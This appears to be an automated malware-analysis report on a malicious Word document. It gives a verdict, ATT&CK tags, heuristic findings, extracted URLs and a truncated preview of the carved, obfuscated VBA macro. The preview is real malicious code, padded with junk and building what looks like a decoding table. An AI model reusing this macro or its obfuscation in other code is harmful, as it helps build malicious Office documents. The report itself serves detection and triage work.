Verdict: MALICIOUS
Risk Score: 224
Malware Insights
MITRE ATT&CK: T1059.005 (Visual Basic), T1566.001 (Spearphishing Attachment)
The file is a Microsoft Office document containing a malicious VBA macro, as indicated by multiple high-severity heuristics, including OLE_VBA_AUTOOPEN and OLE_VBA_CREATEOBJ. The macro is designed to execute code, most likely to download and run a secondary payload. The presence of a URL with unknown reputation suggests a potential command-and-control or download source.
Heuristics (8)
- ClamAV: Doc.Macro.Obfuscated-6397052-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Note that the ns.adobe.com, w3.org, purl.org and schemas.openxmlformats.org entries below are standard XML/XMP namespace identifiers carried in embedded metadata, not network destinations.
  - http://www.isprambiente.gov.it/files/temi/rischio-industriale/stabilimenti.jpg (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 203636 bytes |

SHA-256: 2b203354b168fd698f323b990f69ba7d932f261fc4813cec8a803a2a218a6d9a

Detection for macros.bas:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s))

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wzWNDP"
Public Function mX5GNJC4Z6coaHXk(io0naKp25KyF6oj As String, Optional UmhZLcESgC2F6i As Boolean = True) As String
Static iXlEUNr2bgKBd1R(0 To 255) As Byte
Dim yqSsfl3Vf6YSok, GY7T2C2fZIS As String
yqSsfl3Vf6YSok = 9
GY7T2C2fZIS = 9
#If yqSsfl3Vf6YSok > GY7T2C2fZIS Then
Dim Fqg9ranLICt As LongPtr
#Else
Dim Fqg9ranLICt As Integer
Fqg9ranLICt = 9 + 9
Dim kpIyxkR9E4U As Integer
For kpIyxkR9E4U = 0 To yqSsfl3Vf6YSok
kpIyxkR9E4U = kpIyxkR9E4U + 1
Next kpIyxkR9E4U
#End If
Dim NKaY4WWygvHgiX, jRLEMSNZDXw As Integer
NKaY4WWygvHgiX = 8
jRLEMSNZDXw = 9
#If kkf1GCvtjcg <> 0 Then
kkf1GCvtjcg = kkf1GCvtjcg + 4
Dim Mu3dNddTzyb As Variant
Else
Dim Mu3dNddTzyb As Object
#End If
If NKaY4WWygvHgiX > jRLEMSNZDXw Then
For cwhIgNGP0HCmNv = jRLEMSNZDXw To NKaY4WWygvHgiX
jRLEMSNZDXw = jRLEMSNZDXw / NKaY4WWygvHgiX
Next cwhIgNGP0HCmNv
End If
Dim BaKtEt6tk7PDtU As String
Dim yghnUmZMHqr As String
yghnUmZMHqr = ThDlaBcmmfr
BaKtEt6tk7PDtU = SdBf3Ybo7sH
If (StrComp(BaKtEt6tk7PDtU, yghnUmZMHqr, vbTextCompare) <> 0) Then
MsgBox ("Optional: fbMyJoSuxTeBrM.")
End If
Dim tqX0bTSAQSsKRA, pKBtiyktE1w As String
tqX0bTSAQSsKRA = 3
pKBtiyktE1w = 2
#If tqX0bTSAQSsKRA > pKBtiyktE1w Then
Dim CcQRshD8GOI As LongPtr
#Else
Dim CcQRshD8GOI As Integer
CcQRshD8GOI = 3 + 2
Dim uTmRgructhr As Integer
For uTmRgructhr = 0 To tqX0bTSAQSsKRA
uTmRgructhr = uTmRgructhr + 1
Next uTmRgructhr
#End If
Dim rTu4zrinoirCLDU6() As Byte, ynTzNrCCX83ZGP() As Byte
Dim ivDr2KAZxEn23M As String
Dim BdXfhZlc43axfa, uKTCqTIHIrK As Integer
BdXfhZlc43axfa = 2
uKTCqTIHIrK = 3
#If hxbLE4y1BKw <> 0 Then
hxbLE4y1BKw = hxbLE4y1BKw + 8
Dim d1NNVkxKv8P As Variant
Else
Dim d1NNVkxKv8P As Object
#End If
If BdXfhZlc43axfa > uKTCqTIHIrK Then
For sAk16rEV4UpV2j = uKTCqTIHIrK To BdXfhZlc43axfa
uKTCqTIHIrK = uKTCqTIHIrK / BdXfhZlc43axfa
Next sAk16rEV4UpV2j
End If
Dim V8bkN7GzqPc3fU As String
Dim hLT8KJAwk29 As String
hLT8KJAwk29 = VGOGzmVtKdk
V8bkN7GzqPc3fU = lrnBfKwAps6
If (StrComp(V8bkN7GzqPc3fU, hLT8KJAwk29, vbTextCompare) <> 0) Then
MsgBox ("Optional: ZywOTywKnYily0.")
End If
Dim rLnd3WijknvSm8 As Integer
For QViLWB0Tff7 = 1 To 14
rLnd3WijknvSm8 = QViLWB0Tff7
Next QViLWB0Tff7
Dim HMBnVaVB11GyEfn As Long, JaxGjMQGEEHUrhxyJg As Long
Dim YsI8ijqncOyWWB As String
YsI8ijqncOyWWB = Application.UserName
Dim kWqybeuBAyQ, zSAhzeeWcrTsDX As Integer
zSAhzeeWcrTsDX = Len(YsI8ijqncOyWWB)
Dim ZMoToXrB00J As Collection
While zSAhzeeWcrTsDX > 4
kWqybeuBAyQ = kWqybeuBAyQ + 5
zSAhzeeWcrTsDX = zSAhzeeWcrTsDX - 4
Wend
Dim BUz1GVgLhq9KlV As Collection
Set BUz1GVgLhq9KlV = New Collection
BUz1GVgLhq9KlV.Add "ZMoToXrB00J"
BUz1GVgLhq9KlV.Add "jrnxIICrXtN"
BUz1GVgLhq9KlV.Add "g8SbgRNVSHjNge"
Dim pFTAkJOytcKJjZ As Integer
For pRbwjiXjpBq = 1 To 15
pFTAkJOytcKJjZ = pRbwjiXjpBq
Next pRbwjiXjpBq
Dim daR1CxMz1wCK4z As Integer
Dim e3Y47B5ldyL As String
daR1CxMz1wCK4z = 4244
Dim FzvkgWscNxI As Integer
e3Y47B5ldyL = Right(CStr(daR1CxMz1wCK4z), 1)
FzvkgWscNxI = CInt(e3Y47B5ldyL)
For UJnLUO1I3jC = FzvkgWscNxI To 79
daR1CxMz1wCK4z = daR1CxMz1wCK4z + 7
Next UJnLUO1I3jC
If iXlEUNr2bgKBd1R(0) = 0 Then
Dim iXI96hEjjH0uE6 As String
Dim DTJc9u7ywAC As String
DTJc9u7ywAC = RJwE0qk6Fjt
iXI96hEjjH0uE6 = TRtZiyZhwa9
If (StrComp(iXI96hEjjH0uE6, DTJc9u7ywAC, vbTextCompare) <> 0) Then
MsgBox ("Optional: kvngtivM0kI7lY.")
End If
For HMBnVaVB11GyEfn = 0 To 255
Dim ctd1jafW9YbUuh As Integer
Dim co2mikGl5RW As String
ctd1jafW9YbUuh = 4217
Dim whFL5qU3njp As Integer
co2mikGl5RW = Right(CStr(ctd1jafW9YbUuh), 1)
whFL5qU3njp = CInt(co2mikGl5RW)
For xxoSr1YiWVj = whFL5qU3njp To 29
ctd1jafW9YbUuh = ctd1jafW9YbUuh + 4
Next xxoSr1YiWVj
Dim cFWm1uUBZSqT0P As Integer
For WQdQhSeUniV = 7 To 74
cFWm1uUBZSqT0P = WQdQhSeUniV
Next WQdQhSeU
... (truncated)